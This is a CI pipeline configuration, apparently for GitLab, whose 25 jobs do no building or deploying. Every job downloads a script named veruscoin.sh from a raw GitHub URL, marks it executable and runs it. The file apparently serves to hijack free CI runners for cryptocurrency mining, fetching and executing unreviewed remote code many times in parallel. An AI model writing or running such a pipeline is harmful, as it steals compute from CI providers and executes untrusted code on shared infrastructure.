stages:
  - bachannel
  - build
  - deploy
 
bachannel_1:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
bachannel_2:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_3:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_4:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_5:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_6:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_7:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_8:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_9:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_10:
  stage: build
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_11:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_12:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_13:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_14:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_15:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_16:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_17:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_18:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_19:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_20:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_21:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
 
bachannel_22:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
 
bachannel_23:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
 
bachannel_24:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
 
bachannel_25:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/pratama949163/mnteeeppp/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh